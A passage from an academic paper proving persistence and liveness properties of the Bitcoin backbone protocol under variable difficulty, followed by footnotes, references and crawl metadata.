(1+\\frac{\\delta }{2}\\Bigr )\\lambda d' \\ge \\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\sum _{u\\in S}Q_u .\\end{aligned}\n(4)\nThe first inequality follows from the definition of x and $$d'$$ and Proposition 5. The second one comes from the relation between x and $$d'$$ outlined in (3). To see the last inequality, assume $$\\sum _{u\\in S}Q_u>d'$$. But then, by the Chain-Growth Lemma 1, the assumption than an honest party is on $$B_{v'}$$ at round $$r_2$$ is contradicted as all honest parties should be at chains of greater length. We now observe that (4) contradicts Proposition 3, since\n$$\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\sum _{u\\in S}Q_u >(1-\\epsilon )(1-\\theta f)\\Bigl (1-\\frac{\\delta }{2}\\Bigr )p\\sum _{u\\in S}n_u \\ge (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u ,$$\nwhere the middle inequality follows by Requirement (R2).\n\nTo finish the proof we need to consider the case in which these $$L'$$ blocks contain blocks that the adversary computed in rounds outside S. It is not hard to see that this case implies either a prediction or an insertion and cannot occur in a typical execution.    $$\\square$$\n\n### Theorem 4\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. 
Persistence is satisfied with depth $$k\\ge \\frac{\\theta \\gamma m}{4\\tau }$$.\n\n### Proof\n\nSuppose an honest party P has at round r a chain $$\\mathcal {C}$$ such that $$\\mathcal {C}^{\\lceil k}$$ contains a transaction $$\\mathrm {tx}$$.\n\nWe first show that the $$k\\ge \\smash {\\frac{\\theta \\gamma m}{4\\tau }}$$ blocks of $$\\mathcal {C}$$ cannot have been computed in less than $$\\smash {\\frac{m}{16\\tau f}}$$ rounds. Suppose—towards a contradiction—that this was the case. By Lemma 3, at least $$\\smash {\\frac{\\theta \\gamma m}{8\\tau }}$$ of the k blocks belong to a single epoch and Proposition 6 is contradicted.\n\nTo show persistence, note that if any party $$P'\\ne P$$ has a chain $$\\mathcal {C}'$$ at round r and $$\\mathcal {C}^{\\lceil k}$$ is not a prefix of $$\\mathcal {C}'$$, then Lemma 5 is contradicted. Next, let $$r'>r$$ be the first round after r such that an honest party $$P'$$ has a chain $$\\mathcal {C}'$$ such that $${\\mathcal {C}^{\\lceil k}}$$ is not a prefix of $$\\mathcal {C}'$$. By the note above and the minimality of $$r'$$ it follows that no honest party had a prefix of $$\\mathcal {C}'$$ at round $$r'-1$$. Thus, $$\\mathcal {C}'$$ existed at round $$r'-1$$ and $$P'$$ had another chain $$\\mathcal {C}''$$ at that round such that $$\\mathcal {C}^{\\lceil k}\\preceq \\mathcal {C}''$$ and $$\\mathrm {diff}(\\mathcal {C}'')<\\mathrm {diff}(\\mathcal {C}')$$. We now observe that $$\\mathcal {C}'$$ and $$\\mathcal {C}''$$ contradict Lemma 5 at round $$r'-1$$.    $$\\square$$\n\n### Theorem 5\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Liveness is satisfied for depth k with wait-time $$\\frac{m}{16\\tau f}+\\frac{\\gamma k}{\\eta f(1-\\epsilon )(1-\\theta f)}$$.\n\n### Proof\n\nSuppose a transaction $$\\mathrm {tx}$$ is included in any block computed by an honest party for $$\\smash {\\frac{m}{16\\tau f}}$$ consecutive rounds and let S denote the set of $$\\smash {\\frac{\\gamma k}{\\eta f(1-\\epsilon )(1-\\theta f)}}$$ rounds that follow these rounds. Consider now the chain $$\\mathcal {C}$$ of an arbitrary honest party after the rounds in S. By Lemma 2, $$\\mathcal {C}$$ contains an honest block computed in the $$\\frac{m}{16\\tau f}$$ rounds. This block contains $$\\mathrm {tx}$$. Furthermore, after the rounds in the set S, on top of this block there has been accumulated at least $$\\sum _{r\\in S}Q_r$$ amount of difficulty. We claim that this much difficulty corresponds to at least k blocks. To show this, assume $$|S|\\le s$$ (or consider only the first s rounds of S). Let T be the smallest target computed by an honest party during the rounds in S and let u be such a round. It suffices to show $$T\\sum _{r\\in S}Q_r\\ge k$$. Indeed,\n$$T\\sum _{r\\in S}Q_r \\ge (1-\\epsilon )(1-\\theta f)pT\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)\\frac{pTn_u|S|}{\\gamma }\\ge k .$$\nThe first inequality follows from Proposition 3, the second by Fact 1, and for the last one we substitute the size of S and use that $$pTn_u\\ge f(T,n_u)\\ge \\eta f$$ (since u is $$(\\eta ,\\theta )$$-good).    $$\\square$$\n\n## Footnotes\n\n1. 1.\n\nIn Bitcoin, solving a proof of work essentially amounts to brute-forcing a hash inequality based on SHA-256.\n\n2. 2.\n\nIn Bitcoin, m is set to 2016 and roughly corresponds to 2 weeks in real time—assuming the number of parties does not change much.\n\n3. 
3.\n\nIn the latest version of , we show that in the case of fixed difficulty, the analysis of the Bitcoin backbone in the synchronous model extends with relative ease to partial synchrony. We leave the extension of the variable-difficulty case for future work.\n\n4. 4.\n\nIn this is referred to as the “flat-model” in terms of computational power, where all parties are assumed equal. In practice, different parties may have different “hashing power”; note that this does not sacrifice generality since one can imagine that real parties are simply clusters of some arbitrary number of flat-model parties.\n\n5. 5.\n\nNote that in order to calculate f, we can consider that a round of full interaction lasts 18 s; If this is combined with the fact that the target is set for a POW to be discovered approximately every 10 min, we have that 18/600 = 0.3 is a good estimate for f.\n\n## References\n\n1. 1.\nBack, A.: Hashcash (1997). http://www.cypherspace.org/hashcash\n2. 2.\nBahack, L.: Theoretical bitcoin attacks with less than half of the computational power (draft). IACR Cryptology ePrint Archive 2013, 868 (2013). http://eprint.iacr.org/2013/868\n3. 3.\nBellare, M., Rogaway, P.: Random oracles are practical: a paradigm for designing efficient protocols. In: Denning, D.E., Pyle, R., Ganesan, R., Sandhu, R.S., Ashby, V. (eds.) Proceedings of the 1st ACM Conference on Computer and Communications Security, CCS 1993, Fairfax, Virginia, USA, 3–5 November 1993, pp. 62–73. ACM (1993). http://doi.acm.org/10.1145/168588.168596\n4. 4.\nCanetti, R.: Security and composition of multiparty cryptographic protocols. J. Cryptol. 13(1), 143–202 (2000)\n5. 5.\nCanetti, R.: Universally composable security: a new paradigm for cryptographic protocols. Cryptology ePrint Archive, Report 2000/067 (2000). http://eprint.iacr.org/2000/067\n6. 6.\nCanetti, R.: Universally composable security: a new paradigm for cryptographic protocols. In: 42nd Annual Symposium on Foundations of Computer Science, FOCS 2001, 14–17 October 2001, Las Vegas, Nevada, USA, pp. 136–145. IEEE Computer Society (2001). http://dx.doi.org/10.1109/SFCS.2001.959888\n7. 7.\nDwork, C., Lynch, N.A., Stockmeyer, L.J.: Consensus in the presence of partial synchrony. J. ACM 35(2), 288–323 (1988). http://doi.acm.org/10.1145/42282.42283\n8. 8.\nDwork, C., Naor, M.: Pricing via processing or combatting junk mail. In: Brickell, E.F. (ed.) CRYPTO 1992. LNCS, vol. 740, pp. 139–147. Springer, Heidelberg (1993). doi:\n9. 9.\nEyal, I., Sirer, E.G.: Majority is not enough: bitcoin mining is vulnerable. In: Christin, N., Safavi-Naini, R. (eds.) FC 2014. LNCS, vol. 8437, pp. 436–454. Springer, Heidelberg (2014). doi: Google Scholar\n10. 10.\nGaray, J.A., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol: analysis and applications. IACR Cryptology ePrint Archive 2014, 765 (2014). http://eprint.iacr.org/2014/765\n11. 11.\nGaray, J., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol: analysis and applications. In: Oswald, E., Fischlin, M. (eds.) EUROCRYPT 2015. LNCS, vol. 9057, pp. 281–310. Springer, Heidelberg (2015). doi: Google Scholar\n12. 12.\nGaray, J.A., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol with chains of variable difficulty. IACR Cryptology ePrint Archive 2016, 1048 (2016). http://eprint.iacr.org/2016/1048\n13. 13.\nHadzilacos, V., Toueg, S.: A modular approach to fault-tolerant broadcasts and related problems. Technical report (1994)Google Scholar\n14. 
14.\nJuels, A., Brainard, J.G.: Client puzzles: a cryptographic countermeasure against connection depletion attacks. In: NDSS, The Internet Society (1999)Google Scholar\n15. 15.\nKiayias, A., Koutsoupias, E., Kyropoulou, M., Tselekounis, Y.: Blockchain mining games. In: Conitzer, V., Bergemann, D., Chen, Y. (eds.) Proceedings of the 2016 ACM Conference on Economics and Computation, EC 2016, Maastricht, The Netherlands, 24–28 July 2016, pp. 365–382. ACM (2016). http://doi.acm.org/10.1145/2940716.2940773\n16. 16.\nKiayias, A., Panagiotakos, G.: Speed-security tradeoffs in blockchain protocols. IACR Cryptology ePrint Archive 2015, 1019 (2015). http://eprint.iacr.org/2015/1019\n17. 17.\nLamport, L., Shostak, R.E., Pease, M.C.: The byzantine generals problem. ACM Trans. Program. Lang. Syst. 4(3), 382–401 (1982)\n18. 18.\nMcDiarmid, C.: Concentration. In: Habib, M., McDiarmid, C., Ramirez-Alfonsin, J., Reed, B. (eds.) Probabilistic Methods for Algorithmic Discrete Mathematics. Algorithms and Combinatorics, vol. 16, pp. 195–248. Springer, Heidelberg (1998). doi:\n19. 19.\nMitzenmacher, M., Upfal, E.: Probability and Computing - Randomized Algorithms and Probabilistic Analysis. Cambridge University Press, Cambridge (2005)\n20. 20.\nNakamoto, S.: Bitcoin open source implementation of P2P currency. http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source\n21. 21.\nPass, R., Seeman, L., Shelat, A.: Analysis of the blockchain protocol in asynchronous networks. In: Coron, J.-S., Nielsen, J.B. (eds.) EUROCRYPT 2017. LNCS, vol. 10211, pp. 643–673. Springer, Cham (2017). doi:\n22. 22.\nPease, M.C., Shostak, R.E., Lamport, L.: Reaching agreement in the presence of faults. J. ACM 27(2), 228–234 (1980)\n23. 23.\nRivest, R.L., Shamir, A., Wagner, D.A.: Time-lock puzzles and timed-release crypto. Technical report, Cambridge, MA, USA (1996)Google Scholar\n24. 24.\nSapirshtein, A., Sompolinsky, Y., Zohar, A.: Optimal selfish mining strategies in bitcoin. CoRR abs/1507.06183 (2015). http://arxiv.org/abs/1507.06183" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8842074,"math_prob":0.9994797,"size":76765,"snap":"2020-34-2020-40","text_gpt3_token_len":20546,"char_repetition_ratio":0.16806711,"word_repetition_ratio":0.10193527,"special_character_ratio":0.28347555,"punctuation_ratio":0.11577522,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994934,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-26T12:59:42Z\",\"WARC-Record-ID\":\"<urn:uuid:6d815721-5ea2-4012-8aba-310384c53eb6>\",\"Content-Length\":\"272577\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cffe660b-4a78-47e3-a8e6-5be1fd1e58b0>\",\"WARC-Concurrent-To\":\"<urn:uuid:463e1c7e-e0b0-4aaf-8af9-8c9e3670b0ce>\",\"WARC-IP-Address\":\"199.232.64.95\",\"WARC-Target-URI\":\"https://link.springer.com/chapter/10.1007/978-3-319-63688-7_10\",\"WARC-Payload-Digest\":\"sha1:CBOUUSU7Q7TKZSBFHEQKMUKLME7EYLDL\",\"WARC-Block-Digest\":\"sha1:6PSYEEZ3YVDLPYRSOD3L65BLHFAJ2QFY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400241093.64_warc_CC-MAIN-20200926102645-20200926132645-00596.warc.gz\"}"}
https://plati.market/itm/k1-option-83-figure-8-of-condition-3-targ-sm-1989/2368576
[ "# K1 Option 83 (Figure 8 of Condition 3) Targ SM. 1989\n\n• USD\n• RUB\n• USD\n• EUR\nAffiliates: 0,02 \\$how to earn\nSold: 0\nContent: K1_83_89.pdf 60,1 kB\nLoyalty discount! If the total amount of your purchases from the seller Timur_ed more than:\n 15 \\$ the discount is 20%", null, "## Seller", null, "Timur_ed information about the seller and his items\n\n## Product description\n\na) Point B moves in the xy plane; the trajectory of the point in the figures is shown conditionally. The law of motion of a point is given by the equations x = f1 (t), y = f2 (t), where x and y are expressed in centimeters, t-in seconds. Find the equation of the trajectory of the point; for the time t1 = 1c, determine the speed and acceleration of the point, as well as its tangential and normal acceleration and the radius of curvature at the corresponding point of the trajectory. b) The point moves along an arc of a circle of radius R = 2m according to the law S = f (t), S- in meters, t - in seconds. Determine the speed and acceleration of the point at time t1 = 1c.", null, "" ]
[ null, "https://plati.market/img/passport_ico_32.png", null, "https://plati.market/img/icon-merchant-0.png", null, "https://shop.digiseller.ru/asp/cntview.asp", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72124636,"math_prob":0.994572,"size":2194,"snap":"2022-05-2022-21","text_gpt3_token_len":664,"char_repetition_ratio":0.09497717,"word_repetition_ratio":0.00982801,"special_character_ratio":0.3413856,"punctuation_ratio":0.07317073,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9895259,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T06:51:03Z\",\"WARC-Record-ID\":\"<urn:uuid:751bb6d0-8490-46f4-9dd5-66e5958c8de9>\",\"Content-Length\":\"59202\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:88d7c647-91a8-42e0-b7d4-19362c7ee22f>\",\"WARC-Concurrent-To\":\"<urn:uuid:610d53c5-6354-4ce5-8fcc-e48396332ca4>\",\"WARC-IP-Address\":\"185.26.97.103\",\"WARC-Target-URI\":\"https://plati.market/itm/k1-option-83-figure-8-of-condition-3-targ-sm-1989/2368576\",\"WARC-Payload-Digest\":\"sha1:YD5TQRTOV2QRLGL4OI7XZNLX3KZMV5VL\",\"WARC-Block-Digest\":\"sha1:5Y6F7EUH45UH4L5BDUTK2UTX3MHN6BS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662521152.22_warc_CC-MAIN-20220518052503-20220518082503-00508.warc.gz\"}"}
http://www.51zjedu.com/yinianji/rjbsxx/27865.html
[ "# 小学一年级下册数学12套口算题\n\n 29-11= 16- 4= 89-24= 29- 8= 98-77= 52-50= 24-13= 10+20= 14+25= 31-11= 17- 7= 19-12= 98-80= 25-4= 99-23= 24-13= 15+14= 90-10= 20+8= 25+33= 18+11= 28+2= 29+1= 25+25= 26-10= 12+5= 28+11= 25+12= 23-3= 12+10= 16+13= 24+4= 19+11= 17-12= 18-8= 19-6= 29+10= 72-10= 20+30= 99-98= 12+17= 60-40= 17-17= 90-40= 16+54= 20-10= 70-50= 50-30= 60+30= 12+33= 28+6= 16+44= 20+44= 50-50= 19-18= 18-15= 88+12= 66-16= 90-30= 65-25= 50-20= 87-7= 80+9= 18-13= 13+17= 15+53= 16+13= 14+22= 89-80= 14+26= 56-40= 66-20= 99-33= 66-46= 19+60= 17-(  )=0 17-14= 15-3= 80+4= 26-16= 19-(  )=13 27-14= 18+(  )=20 14+(  )=27 67-12= 16-(  )=12 65-33= 65+25= 24+24= 8+(  )=16 10+(  )=50 65+(  )=70 (  )-20=50 40+(  )=60 20+(  )=30 87-33= 16-6= 80-(  )=0 75-25= 30+30=\n\n 69+ 3= 47- 6= 59+10= 28+ 9= 73+ 6= 4 +50= 22- 9= 15+ 8= 8 +12= 9 + 6= 18- 9= 72- 2= 49+ 7= 27+14= 59- 6= 82- 1= 25- 5= 64+ 5= 89- 4= 19- 6= 55+25= 69+13= 48+13= 87-12= 21- 5= 9 +43= 12+10= 80-20= 67-15= 35-16= 29-13= 66-15= 12- 7= 10+19= 16-11= 90+10= 29-13= 85-16= 44-13= 22-11= 34+16= 88-18= 60-12= 51-12= 97-17= 17+16= 26+ 3= 67- 7= 98-18= 29-19= 100-4= 99+ 1= 29-13= 39+ 2= 30+12= 83-11= 50+50= 29-10= 68+ 5= 30+70= 87-10= 77-15= 99-66= 33+11= 16+ 3= 83-19= 26+38= 70+20= 56+16= 60-20= 22+40= 34+12= 13- 8= 23- 4= 82- 6= 82-15= 100-(  )=80 23-(  )=18 44+(  )=60 70-(  )=20 23+16= 55+33= 34+12= 47-30= 21+47= 26+(  )=66 86+9= 66+5= 24+9= 9 +54= 60-16= 16+(  )=56 41-(  )=30 86-12= 73-44= 66+12= 74-15= 69-13= 69+(  )=80 44-15=", null, "" ]
[ null, "http://www.51zjedu.com/images/download.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.59521735,"math_prob":1.0000097,"size":1839,"snap":"2021-31-2021-39","text_gpt3_token_len":1079,"char_repetition_ratio":0.25395095,"word_repetition_ratio":0.0,"special_character_ratio":0.94072866,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T18:14:29Z\",\"WARC-Record-ID\":\"<urn:uuid:313dca02-98f2-4b91-958a-a1910d0a4eb7>\",\"Content-Length\":\"170487\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:edcded18-d4db-4d25-bc8d-cbcdb26b47e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:197970cd-3da7-4fa8-9834-df7b84a7b481>\",\"WARC-IP-Address\":\"114.215.199.96\",\"WARC-Target-URI\":\"http://www.51zjedu.com/yinianji/rjbsxx/27865.html\",\"WARC-Payload-Digest\":\"sha1:AVIOCVTQH37BAHARFNCU5PI5VZOTY2SN\",\"WARC-Block-Digest\":\"sha1:ZOAMKRRXMPBIF5X334QCNSKSWGY6DGF5\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154466.61_warc_CC-MAIN-20210803155731-20210803185731-00015.warc.gz\"}"}
https://slideplayer.com/slide/6204500/
[ "", null, "# 1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\n\n## Presentation on theme: \"1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\"— Presentation transcript:\n\n1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line that is parallel or perpendicular to a given line. Standard: 2.8.11.A Analyze a given set of data for the existence of a pattern and represent the pattern algebraically and graphically.\n\nI. Point-Slope Form If a line has a slope of m and contains the point (x 1, y 1 ), then the point-slope form of its equation is y – y 1 = m(x – x 1 ). Ex 1. Write an equation in point-slope form for the line that has a slope of ½ and contains the point (-8, 3). Then write the equation in slope-intercept form.\n\nI. Point-Slope Form Ex 2. Write an equation in point-slope form for the line that has a slope of 5 and passes through the point (-1, -3). Then write the equation in slope- intercept form.\n\nII. Writing an equation in slope-intercept form for a line containing two given points. Find the slope. Substitute “m” & one of the two points you were given into y = mx + b to find “b.” Write the equation in y = mx + b form with the values for “m” and the “b” that you calculated.\n\nII. Write an equation in slope-intercept form for the line containing the two given points. Ex 1. (4, -3) and (2,1)\n\nII. Write an equation in slope-intercept form for the line containing the two given points. Ex 2. (1, -3) and (3, -5)\n\nIII. Parallel and Perpendicular Lines Parallel Lines – If two lines have the same slope, they are parallel. If two lines are parallel, they have the same slope. All vertical lines have an undefined slope and are parallel to one another. All horizontal lines have a slope of 0 and are parallel to one another. y = 2x + 5 and y = 2x – 1 Perpendicular Lines – If a nonvertical line is perpendicular to another line, the slopes of the lines are opposite sign and reciprocal of one another. All vertical lines are perpendicular to all horizontal lines. All horizontal lines are perpendicular to all vertical lines. y = 2x + 2 & y = -1/2x + 4\n\nIII. Parallel and Perpendicular Lines (-2, 5), y = -2x + 4 Parallel Perpendicular\n\nIII. Parallel and Perpendicular Lines (8, 5), y = -x + 2 Parallel Perpendicular\n\nIII.Parallel and Perpendicular Lines 1.(5, -3), y = 4x + 22. (-2, 3), y = -3x+2 3. (4, -3), 3x + 4y = 84. (-6, 2), y = -2/3 x - 3 For each of the following: 5.(1, -4), y = 3x – 26. (0, -5), y = x – 5 7. (3, -1), 12x + 4y = 88. (-2, 4), x – 6y = 15 Find a line that goes through the given point and is parallel to the given line. Find a line that goes through the given point and is perpendicular to the given line.\n\nWriting Activities: Parallel and Perpendicular Lines 1. Describe the relationship between the equations of 2 parallel lines. Include an example. 2. Describe the relationship between the equations of 2 perpendicular lines. Include an example.\n\n3. Explain how to write an equation for the line that contains the point (2, -3) and is parallel to the graph of x – 2y = 2. 4. 
Explain how to write an equation for the line that contains the point (2, -3) and is perpendicular to the graph of x – 2y = 2.\n\nHomework Integrated Algebra II- Section 1.3 Level A even #’s Honors Algebra II- Section 1.3 Level B\n\nDownload ppt \"1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\"\n\nSimilar presentations" ]
[ null, "https://slideplayer.com/static/blue_design/img/slide-loader4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87089324,"math_prob":0.999121,"size":3380,"snap":"2023-40-2023-50","text_gpt3_token_len":947,"char_repetition_ratio":0.17624408,"word_repetition_ratio":0.19129083,"special_character_ratio":0.29822487,"punctuation_ratio":0.1401099,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999157,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-30T03:59:20Z\",\"WARC-Record-ID\":\"<urn:uuid:5903c715-793d-4bc9-8532-7165fed946aa>\",\"Content-Length\":\"157616\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ba68fab-c6ee-4c24-b1b3-b014e1dc066c>\",\"WARC-Concurrent-To\":\"<urn:uuid:cbb697f5-1a95-4006-a344-4e48642c11d3>\",\"WARC-IP-Address\":\"138.201.54.25\",\"WARC-Target-URI\":\"https://slideplayer.com/slide/6204500/\",\"WARC-Payload-Digest\":\"sha1:XHNX5XE6AWMJ7S7GUSYZJFBHAPLNFWAE\",\"WARC-Block-Digest\":\"sha1:TJNZW7RSPPR47YQNE5YTGNZ44RFFGJ5C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100164.87_warc_CC-MAIN-20231130031610-20231130061610-00882.warc.gz\"}"}
https://dzone.com/articles/algorithm-week-shorted-path
[ "{{announcement.body}}\n{{announcement.title}}\n\n# Algorithm of the Week: Shortest Path in a Directed Acyclic Graph\n\nDZone 's Guide to\n\n# Algorithm of the Week: Shortest Path in a Directed Acyclic Graph\n\n· Database Zone ·\nFree Resource\n\nComment (0)\n\nSave\n{{ articles.views | formatCount}} Views\n\n## Introduction\n\nWe saw how to find the shortest path in a graph with positive edges using the Dijkstra’s algorithm. We also know how to find the shortest paths from a given source node to all other nodes even when there are negative edges using the Bellman-Ford algorithm. Now we’ll see that there’s a faster algorithm running in linear time that can find the shortest paths from a given source node to all other reachable vertices in a directed acyclic graph, also known as a DAG.\n\nBecause the DAG is acyclic we don’t have to worry about negative cycles. As we already know it’s pointless to speak about shortest path in the presence of negative cycles because we can “loop” over these cycles and practically our path will become shorter and shorter.", null, "The presence of a negative cycles make our attempt to find the shortest path pointless!\n\nThus we have two problems to overcome with Dijkstra and the Bellman-Ford algorithms. First of all we needed only positive weights and on the second place we didn’t want cycles. Well, we can handle both cases in this algorithm.\n\n## Overview\n\nThe first thing we know about DAGs is that they can easily be topologically sorted. Topological sort can be used in many practical cases, but perhaps the mostly used one is when trying to schedule dependent tasks.\n\nAfter a topological sort we end with a list of vertices of the DAG and we’re sure that if there’s an edge (u, v), u will precede v in the topologically sorted list.", null, "If there’s an edge (u,v) then u must precede v. This results in the more general case from the image. There’s no edge between B and D, but B precedes D!\n\nThis information is precious and the only thing we need to do is to pass through this sorted list and to calculate distances for a shortest paths just like the algorithm of Dijkstra.\n\nOK, so let’s summarize this algorithm:\n- First we must topologically sort the DAG;\n- As a second step we set the distance to the source to 0 and infinity to all other vertices;\n- Then for each vertex from the list we pass through all its neighbors and we check for shortest path;\n\nIt’s pretty much like the Dijkstra’s algorithm with the main difference that we used a priority queue then, while this time we use the list from the topological sort.\n\n## Code\n\nThis time the code is actually a pseudocode. Although all the examples so far was in PHP, perhaps pseudocode is easier to understand and doesn’t bind you in a specific language implementation. Also if you don’t feel comfortable with the given programming language it can be more difficult for you to understand the code than by reading pseudocode.\n\n```1. Topologically sort G into L;\n2. Set the distance to the source to 0;\n3. Set the distances to all other vertices to infinity;\n4. For each vertex u in L\n5. - Walk through all neighbors v of u;\n6. - If dist(v) > dist(u) + w(u, v)\n7. - Set dist(v) <- dist(u) + w(u, v);\n```\n\n## Application\n\nIt’s clear why and where we must use this algorithm. The only problem is that we must be sure that the graph doesn’t have cycles. 
However if we’re aware of how the graph is created we may have some additional information if there are cycles or not – then this linear time algorithm can be very applicable.\n\nTopics:\n\nComment (0)\n\nSave\n{{ articles.views | formatCount}} Views\n\nPublished at DZone with permission of Stoimen Popov , DZone MVB. See the original article here.\n\nOpinions expressed by DZone contributors are their own." ]
[ null, "http://www.stoimen.com/blog/wp-content/uploads/2012/10/1.-Negative-Cycles.png", null, "http://www.stoimen.com/blog/wp-content/uploads/2012/10/3.-Topological-Sort-part-2.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90253973,"math_prob":0.8871313,"size":3404,"snap":"2020-34-2020-40","text_gpt3_token_len":747,"char_repetition_ratio":0.11147059,"word_repetition_ratio":0.06,"special_character_ratio":0.21592245,"punctuation_ratio":0.087537095,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96539515,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-07T04:15:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ac66ed86-042d-4075-837d-e1ae9da09d6c>\",\"Content-Length\":\"182346\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7b5a214-7211-46fb-b674-50dcd2abd0e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:06240a23-63cc-42ac-9c0f-332463af595d>\",\"WARC-IP-Address\":\"3.217.61.161\",\"WARC-Target-URI\":\"https://dzone.com/articles/algorithm-week-shorted-path\",\"WARC-Payload-Digest\":\"sha1:2RFK6HNEGZ4BD736VGTSUVUJZOIXMRDY\",\"WARC-Block-Digest\":\"sha1:DZIRXD7E6L5SRENPIXUDCHD3IZ7ESZWU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737152.0_warc_CC-MAIN-20200807025719-20200807055719-00044.warc.gz\"}"}
http://www.physicsebookcollection.com/2015/09/elementary-mechanics-and-thermodynamics.html
[ "## Thursday, September 24, 2015\n\n### Elementary Mechanics and Thermodynamics by Prof. John W. Norbury", null, "Elementary Mechanics and Thermodynamics Textbook is an ideal book for a typical semester which is 15 weeks long, giving 30 weeks at best for a year long course. At the fastest possible rate, we can \"cover\" only one chapter per week. For a year long course that is 30 chapters at best. Thus ten chapters of the typical book are left out! 1500 pages divided by 30 weeks is about 50 pages per week. The typical text is quite densed mathematics and physics and it's simply impossible for a student to read all of this in the detail required. Also with 100 problems per chapter, it's not possible for a student to do 100 problems each week. Thus it is impossible for a student to fully read and do all the problems in the standard introductory books. Thus these books are not useful to students or instructors teaching the typical course!" ]
[ null, "http://ultraimg.com/images/D6kpR.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9357445,"math_prob":0.61621165,"size":861,"snap":"2020-45-2020-50","text_gpt3_token_len":186,"char_repetition_ratio":0.126021,"word_repetition_ratio":0.013157895,"special_character_ratio":0.22299652,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9521401,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T01:07:49Z\",\"WARC-Record-ID\":\"<urn:uuid:5164ac13-bff8-4eca-a20f-7d50da75179a>\",\"Content-Length\":\"88553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4b9f490-aa47-49dd-8126-1a32a0f06f46>\",\"WARC-Concurrent-To\":\"<urn:uuid:da34ac81-3839-4b9a-b932-cb37cc9bfefb>\",\"WARC-IP-Address\":\"172.217.7.243\",\"WARC-Target-URI\":\"http://www.physicsebookcollection.com/2015/09/elementary-mechanics-and-thermodynamics.html\",\"WARC-Payload-Digest\":\"sha1:B64YNI3OSDCY2SES2KAFRDNIHI7O5GCV\",\"WARC-Block-Digest\":\"sha1:HBPV2IUJSLV74N4QI275JN4QVBFR2MUL\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890108.60_warc_CC-MAIN-20201026002022-20201026032022-00421.warc.gz\"}"}
http://herongyang.com/Cryptography/DES-Mode-Encryption-Operation-Mode-Introduction.html
